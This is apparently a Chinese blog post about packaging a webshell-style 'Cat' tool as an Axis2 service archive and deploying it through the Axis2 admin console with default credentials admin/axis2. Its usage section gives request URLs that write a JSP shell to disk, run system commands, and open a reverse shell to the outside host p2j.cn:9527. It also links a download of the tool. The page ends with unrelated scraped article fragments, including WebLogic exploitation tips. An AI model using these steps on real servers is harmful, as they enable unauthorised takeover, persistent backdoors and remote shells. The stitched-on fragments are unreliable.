axis2 利用小工具cat.aar

Axis2:

Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构)。

昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接。看起来别人可以修改response类型,但是我没成功。利用之前发的Cat小工具打包成aar就可以玩了。

axis2管理登陆默认配置了用户名为admin,密码axis2:

axis2管理后台:

想要deploy 自己的应用需要先打成对应的aar、jar包。用eclipse安装axis2插件。

Service Archive Wizard – Eclipse Plug-in 、Code Generator Wizard – Eclipse Plug-in

下载地址:https://axis.apache.org/axis2/java/core/tools/index.html

下载完成后直接把对应的jar丢到eclipse的dropins目录就行了。

新建一个java项目,写好相关脚本。

导出aar:

安装完成后新建Axis2 service Archiver项目,当然可以根据自己的需求可以利用Axis2 code generator生成wsdl文件。

指定class file为此项目编译目录。

wsdl可以自动生成或者load已生成的wadl文件,可以跳过。Add any external libraries不用继续跳过。service.xml也自动生成接这继续跳到下一步。

Generate the Service XML file:

选中可供外部调用的类方法。service name用于部署成功后访问。最后一步写上aar名字和位置就可以生成成功了。

然后继续回到后台deploy Cat.arr:File Cat.aar successfully uploaded

部署成功后切到:Available Services(可用的services)。

访问:http://localhost:8080/axis2/services/Cat?wsdl 可看到所有可被调用的方法名和具体的参数以及返回值类型:

比如调用Cat里面的getClassPathResponse这个方法,会返回了当前的classpath。

往axis2目录写shell: http://localhost:8080/axis2/services/Cat/writeStringToFile?data=test&file=/Users/yz/Documents/install/apache-tomcat-7.0.56/webapps/axis2/1.jsp&encoding=utf-8&append=false

执行命令: http://localhost:8080/axis2/services/Cat/exec?cmd=whoami

反弹Shell: http://localhost:8080/axis2/services/Cat/shell?host=p2j.cn&port=9527

其他功能(文件下载等)请参考:cat小工具,测试完成记得在Available Services 卸载(Remove Service)对应的Service.

下载地址:axis2 利用小工具cat.aar.zip

时间: 2024-10-07 06:39:24

axis2 利用小工具cat.aar的相关文章

如何利用一些小工具快速判断电脑是否中毒

在这个网上支付流行的时代,人们最害怕的事情莫过于电脑病毒了.以前不装杀毒软件"裸奔"是一件再平常不过的事情.现在估计很少有人敢这么干了,生怕自己网银里的钱被别人神不知鬼不觉的偷走了.今天,我就写一篇新手小白文来告诉大家如何快速判断自己的电脑是否已经中毒. 在讨论如何判断电脑是否中毒之前,我们先来说一下病毒常见的一些的特征. 1. 计算器里运行的各种程序我们都可以找到相对应的进程.病毒的进程名通常会比较奇怪.比如一串奇怪的随机名,再比如伪装成一些系统进程名.举个栗子,svchost.ex

web day19 Service层处理事务(利用ThreadLocal),TxQueryRunner小工具,单表练习(增删改查操作),分页

Service事务 DAO中不是处理事务的地方,因为DAO中的每个方法都是对数据库的一次操作 在Service中不应该出现Connection,它应该只在DAO中出现, 因为它是JDBC的东西,JDBC的东西是用来连接数据库的 修改JdbcUtils 我们把对事务的开启和关闭放到JdbcUtils中,在Service中调用JdbcUtils的方法来完成事务的处理, 但在Service中就不会再出现Connection这一"禁忌"了. 代码 public class JdbcUtils

利用python BaseHTTPServer 开发的图片浏览小工具

最近从网上爬了点图片,为了方便浏览就写了这么个小工具.直接上码,解释偏少,代码没有优化,实现比较简略.仅作记录之用. 1.httpd.py 1 # encoding: UTF-8 2 #-*-coding:utf-8-*- 3 import BaseHTTPServer 4 import config 5 import urllib 6 from CreatHtml import CreateHtmlClass 7 import os 8 9 #登录页面代码,做个简单的访问权限控制 10 log

利用ncurses库开发终端工具箱(1)—— ToDoList小工具开发

准备工作 腾讯云服务器(Ubuntu),C++编程语言 由于想输出界面中包含中文,所以安装库 libncursesw5,依次输入下面三行命令 sudo apt-get install libncursesw5 sudo apt-get install libncursesw5-dbg sudo apt-get install libncursesw5-dev 编译用如下命令 g++ main.cpp -l ncursesw ToDoList小工具开发 思路 由于一开始想的就比较多,想做一个工具箱

weblogic利用小技巧

weblogic利用几个小技巧分享: 当通过反序列化获取到服务器权限时,有时可能会需要验证漏洞危害性,查看数据库数据量时,需要上传webshell或者使用后台部署war包,可以用到以下几个小技巧 查看config/config.xml文件,该文件中包含weblogic配置信息,例如站点部署路径.后台登录用户名密码.端口号等Linux下使用 cat ./config/config.xmlWindows下使用 cmd.exe /c type config\config.xmlweblogic利用小技

这些小工具让你的Android 开发更高效

在做Android 开发过程中,会遇到一些小的问题,虽然自己动手也能解决,但是有了一些小工具,解决这些问题就得心应手了,今天就为大家推荐一下Android 开发遇到的小工具,来让你的开发更高效. Vysor Vysor 是一个可以将手机的屏幕投影到电脑上,当然也可以操作,当我们做分享或者演示的时候,这个工具起到了作用. Vector Asset Android Studio 在1.4 支持了VectorAsset,所谓VectorAsset:它可以帮助你在Android 项目中添加Materia

强大的pdf文件操作小工具——PDFtk的小白用法

前言 作为程序员,大家都知道的,总是会被技术小白问各种跟编程没什么关系的硬件.软件问题.曾经被一技术小白同事问到有没有什么办法合并pdf文件,当时自己也是一头雾水,因为自己工作生活很少会去操作pdf文件,而当时公司对开发人员的电脑权限管理很严格,不论是上网还是安装软件,都受到很大限制,最后硬着头皮忙活了一阵子也没在解决. 前两天在写批处理程序的时候,发现批处理程序是有合并文件的命令的,我忽然想起之前这个同事的问题,就试了一下合并pdf,然而并不行.虽然失落了一下,但本着学习的精神还是百度了一下关

几个常用文本处理小工具tr ,wc,cut,sort,uniq用法详解

几个文本处理的小工具:tr ,wc,cut,sort,uniq 1. tr命令可以对来自标准输入的字符进行替换.压缩和删除.它可以将一组字符变成另一组字符,经常用来编写优美的单行命令,作用很强大. 语法:tr 选项  SET1 SET2 -c或--complerment:取代所有不属于第一字符集的字符(就是补集): -d或--delete:删除所有属于第一字符集的字符: -s或--squeeze-repeats:把连续重复的字符以单独一个字符表示: -t或--truncate-set1:先删除第

WordPress主题开发实例:利用侧边栏工具显示联系方式

利用侧边栏显示联系方式是很方便的 一.先开启侧边栏工具,在functions.php加上 $args = array( 'name' => __( '分类侧边栏'), 'id' => 'cat-01', 'description' => '将在分类页显示侧边栏', 'class' => '', 'before_widget' => '<li id="%1$s" class="widget %2$s">', 'after_wi